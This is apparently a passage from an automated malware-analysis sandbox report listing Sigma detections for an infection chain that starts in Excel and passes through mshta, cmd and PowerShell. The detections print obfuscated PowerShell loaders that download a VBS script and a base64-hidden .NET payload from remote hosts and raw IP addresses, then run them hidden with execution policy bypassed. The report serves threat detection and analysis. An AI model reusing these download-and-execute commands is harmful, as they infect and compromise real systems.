4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Sigma detected: Potential PowerShell Command Line Obfuscation
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmorizar);4Ampoe'+'tificar = [dnlib.IO.Home].GetMethod(s'+'IWVAIs'+'IW);4Am'+'poetificar.Invoke(4Amnull, @(sIWtxt.VGFRE/3431/92.321.542.271//:ptthsIW, sIW4Amde'+'sunificarsIW, sIW4AmdesunificarsIW, sIW4AmdesunificarsIW, sIWaspnet_compilersIW, sIW4'+'AmdesunificarsIW, sIW4AmdesunificarsIW,sIW4Amdesunifica'+'rsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW4AmdesunificarsIW,sIW1sIW,sI'+'W4AmdesunificarsIW));') -cREPlAce ([chaR]52+[chaR]65+[chaR]109),[chaR]36 -cREPlAce 'sIW',[chaR]39 -cREPlAce([chaR]83+[chaR]69+[chaR]50),[chaR]124) | &( $ENv:ComspEc[4,24,25]-JoiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('4Amochavilha = sIWhttps://310'+'5.filemail.com/api/file/get?filekey=shTPH'+'bCPX8o'+'-lOtCqHLG6_0x'+'Cy-xl4tnxlAVbQ95-dv'+'iTK5cAR'+'aNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vi'+'d=e01'+'09638c9bfb9571732531'+'309b5ff7c sIW;4Amtrichismo = New-Object System.Net.WebClient;4Amlinfotomia = '+'4Amtrichismo.DownloadData(4Amo'+'chavilha);4Ampresum'+'ptu'+'oso = [System.Text.Encoding]::UTF8.GetString(4'+'Amlinfotom'+'ia);4Amnitidular = sIW<<BA'+'SE64_START>>sIW;4Amobvolvido = sIW'+'<<BASE6'+'4_END>>sIW;4Amlogogrifo = 4Ampr'+'esumptuoso.IndexOf(4Amniti'+'dular'+');4Amtolhido = 4Ampresumptuoso.IndexOf(4Amo'+'bvolvido);4Amlogogrifo -ge 0 -and 4Amtolhido -gt 4Amlogogrifo;4Amlogogrifo += 4Amnitidular.Leng'+'th;4Amvindita = 4Amtolhido - 4Amlogogrifo;4Am'+'figa = 4Ampresumptuoso.Substring(4Amlogogrifo, 4Amvindita);4Amantigamente = -join (4Amfiga.To'+'CharArra'+'y() S'+'E2 ForEach-Obje'+'ct { 4Am_ })[-1..-(4Amfiga.Length)];4Amma'+'rmor'+'izar'+' = ['+'System.Convert]::FromBase64String(4Amantigamente);4Amdesemmadeirar = [System.Reflection.Assemb'+'ly]::Load(4Ammarmoriz
      Sigma detected: Potentially Suspicious PowerShell Child Processes
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3148, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS" , ProcessId: 2764, ProcessName: wscript.exe
      Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
      Sigma detected: PowerShell Base64 Encoded Invoke Keyword
      Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFtbycrJ2NoYXZpbGhhKTs0QW1wcmVzdW0nKydwdHUnKydvc28gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg0JysnQW1saW5mb3RvbScrJ2lhKTs0QW1uaXRpZHVsYXIgPSBzSVc8PEJBJysnU0U2NF9TVEFSVD4+c0lXOzRBbW9idm9sdmlkbyA9IHNJVycrJzw8QkFTRTYnKyc0X0VORD4+c0lXOzRBbWxvZ29ncmlmbyA9IDRBbXByJysnZXN1bXB0dW9zby5JbmRleE9mKDRBbW5pdGknKydkdWxhcicrJyk7NEFtdG9saGlkbyA9IDRBbXByZXN1bXB0dW9zby5JbmRleE9mKDRBbW8nKydidm9sdmlkbyk7NEFtbG9nb2dyaWZvIC1nZSAwIC1hbmQgNEFtdG9saGlkbyAtZ3QgNEFtbG9nb2dyaWZvOzRBbWxvZ29ncmlmbyArPSA0QW1uaXRpZHVsYXIuTGVuZycrJ3RoOzRBbXZpbmRpdGEgPSA0QW10b2xoaWRvIC0gNEFtbG9nb2dyaWZvOzRBbScrJ2ZpZ2EgPSA0QW1wcmVzdW1wdHVvc28uU3Vic3RyaW5nKDRBbWxvZ29ncmlmbywgNEFtdmluZGl0YSk7NEFtYW50aWdhbWVudGUgPSAtam9pbiAoNEFtZmlnYS5UbycrJ0NoYXJBcnJhJysneSgpIFMnKydFMiBGb3JFYWNoLU9iamUnKydjdCB7IDRBbV8gfSlbLTEuLi0oNEFtZmlnYS5MZW5ndGgpXTs0QW1tYScrJ3Jtb3InKydpemFyJysnID0gWycrJ1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyg0QW1hbnRpZ2FtZW50ZSk7NEFtZGVzZW1tYWRlaXJhciA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWInKydseV06OkxvYWQoNEFtbWFybW9yaXphcik7NEFtcG9lJysndGlmaWNhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QocycrJ0lXVkFJcycrJ0lXKTs0QW0nKydwb2V0aWZpY2FyLkludm9rZSg0QW1udWxsLCBAKHNJV3R4dC5WR0ZSRS8zNDMxLzkyLjMyMS41NDIuMjcxLy86cHR0aHNJVywgc0lXNEFtZGUnKydzdW5pZmljYXJzSVcsIHNJVzRBbWRlc3VuaWZpY2Fyc0lXLCBzSVc0QW1kZXN1bmlmaWNhcnNJVywgc0lXYXNwbmV0X2NvbXBpbGVyc0lXLCBzSVc0JysnQW1kZXN1bmlmaWNhcnNJVywgc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYScrJ3JzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXNEFtZGVzdW5pZmljYXJzSVcsc0lXMXNJVyxzSScrJ1c0QW1kZXN1bmlmaWNhcnNJVykpOycpIC1jUkVQbEFjZSAoW2NoYVJdNTIrW2NoYVJdNjUrW2NoYVJdMTA5KSxbY2hhUl0zNiAtY1JFUGxBY2UgJ3NJVycsW2NoYVJdMzkgIC1jUkVQbEFjZShbY2hhUl04MytbY2hhUl02OStbY2hhUl01MCksW2NoYVJdMTI0KSB8ICYoICRFTnY6Q29tc3BFY1s0LDI0LDI1XS1Kb2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnNEFtb2NoYXZpbGhhID0gc0lXaHR0cHM6Ly8zMTAnKyc1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1zaFRQSCcrJ2JDUFg4bycrJy1sT3RDcUhMRzZfMHgnKydDeS14bDR0bnhsQVZiUTk1LWR2JysnaVRLNWNBUicrJ2FOZFFqYmIzbWV4ZndRekttVFhnJnNraXByZWc9dHJ1ZSZwa192aScrJ2Q9ZTAxJysnMDk2MzhjOWJmYjk1NzE3MzI1MzEnKyczMDliNWZmN2Mgc0lXOzRBbXRyaWNoaXNtbyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7NEFtbGluZm90b21pYSA9ICcrJzRBbXRyaWNoaXNtby5Eb3dubG9hZERhdGEoNEFt
      Sigma detected: Suspicious MSHTA Child Process
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImpMYmZUSnJTSXVqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxYnZkQ05QM1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yOS8xMzQzL3NlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZ3MudElGIiwiJGVuVjpBUFBEQVRBXHNlZW1lYmVzdHRoaW5nc3dpdGhlbnRpcmV0aGluZ3N3aXRoZ3JlYXRuYXR1cmV0aGluZy52YlMiLDAsMCk7c1RhUlQtU0xlZVAoMyk7aUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzd2l0aGVudGlyZXRoaW5nc3dpdGhncmVhdG5hdHVyZXRoaW5nLnZiUyI='+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwErSHeLL -EX byPasS -noP -w 1 -C dEvICEcReDEnTialDepLOYMeNt ; invOkE-ExPREsSiOn($(invOKe-expreSSIon('[sYStEM.TExt.EnCOdINg]'+[ChAR]0X3a+[cHar]58+'Utf8.GETStRING([sYsTem.coNVeRT]'+[cHAr]58+[chaR]58+'fromBASE64String('+[ChaR]0X22+'JHFidmRDTlAzWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iZXJERUZJTklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZOcEpJS3Asc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5R09zTE1jLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckFuYlBOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhuVmJyQyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtoenNHaU9LKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
      Sigma detected: Suspicious Microsoft Office Child Process
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3620, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3948, ProcessName: mshta.exe
      Sigma detected: WScript or CScript Dropper
